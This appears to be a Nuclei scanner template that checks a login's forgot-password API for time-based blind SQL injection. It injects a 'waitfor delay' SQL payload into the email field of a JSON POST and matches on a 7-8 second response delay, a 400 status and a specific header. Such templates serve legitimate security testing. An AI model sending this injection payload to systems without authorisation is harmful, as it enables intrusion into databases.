id: LoginSQLI

info:
  name: Login SQLi
  author: excis3
  severity: critical
  description: This template checks for SQLi in the email parameter of the login page.
  tags: sqli

requests:
  - raw:
      - |
        POST /ias/api/auth/forgotPW HTTP/2
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
        Accept: */*
        X-Requested-With: XMLHttpRequest
        Content-Type: application/json
        Content-Length: 203

        {"app_id":"20","email":"test@example.com'; waitfor delay '0:0:7' -- ","appHost":"https://{{Hostname}}/ia"}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=7 && duration<=8'

      - type: status
        status:
          - 400

      - type: word
        part: header
        words:
          - "Request-Context: appId="
